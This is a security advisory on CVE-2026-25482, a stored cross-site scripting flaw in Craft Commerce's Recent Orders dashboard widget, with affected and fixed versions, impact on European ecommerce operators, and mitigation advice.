CVE-2026-25482 is a stored DOM-based Cross-Site Scripting (XSS) vulnerability identified in Craft Commerce, an ecommerce platform built on Craft CMS. The vulnerability exists in the "Recent Orders" dashboard widget, specifically in the way the Order Status Name is rendered. Instead of properly escaping or sanitizing the input, the platform uses JavaScript string concatenation to render the Order Status Name. This improper neutralization of input (CWE-79) allows an attacker who can influence the Order Status Name to inject malicious JavaScript code. When an administrator with dashboard access views the Recent Orders widget, the injected script executes in the context of their browser session. This can lead to session hijacking, privilege escalation, or other malicious actions within the admin interface. The vulnerability affects Craft Commerce versions from 4.0.0-RC1 up to 4.10.0 and from 5.0.0 up to 5.5.1. The issue has been addressed in versions 4.10.1 and 5.5.2 by implementing proper escaping mechanisms. The CVSS 4.0 vector indicates network attack vector, low attack complexity, no privileges required beyond admin, user interaction required, and high scope impact on integrity and confidentiality. No known exploits are currently reported in the wild, but the vulnerability poses a significant risk due to the administrative context of exploitation.

For European organizations using Craft Commerce within the affected version ranges, this vulnerability presents a risk of administrative account compromise and potential unauthorized control over ecommerce operations. Exploitation could lead to theft of sensitive customer data, manipulation of order statuses, or insertion of fraudulent orders. Given that the attack requires admin dashboard access, the threat is primarily internal or from attackers who have compromised lower-level credentials or social engineered admin users. The impact on confidentiality and integrity is high, as malicious scripts can hijack sessions or perform unauthorized actions. Availability impact is limited but could occur if attackers disrupt dashboard functionality. The medium CVSS score reflects the need for admin privileges and user interaction, but the potential damage to ecommerce operations and customer trust is significant. European ecommerce businesses, especially those handling sensitive payment and customer data, could face regulatory and reputational consequences if exploited.

European organizations should immediately upgrade Craft Commerce installations to versions 4.10.1 or 5.5.2 or later to apply the official patch. Until patched, restrict admin dashboard access to trusted personnel and enforce strong multi-factor authentication to reduce the risk of credential compromise. Implement Content Security Policy (CSP) headers to limit the impact of injected scripts. Conduct regular audits of order status inputs to detect suspicious or malformed entries that could indicate attempted exploitation. Educate administrators about phishing and social engineering risks that could lead to credential theft. Monitor web server and application logs for unusual activity around the dashboard widget. Consider isolating the admin dashboard behind VPN or IP allowlists to reduce exposure. Finally, review and harden JavaScript rendering practices in custom plugins or extensions to prevent similar injection flaws.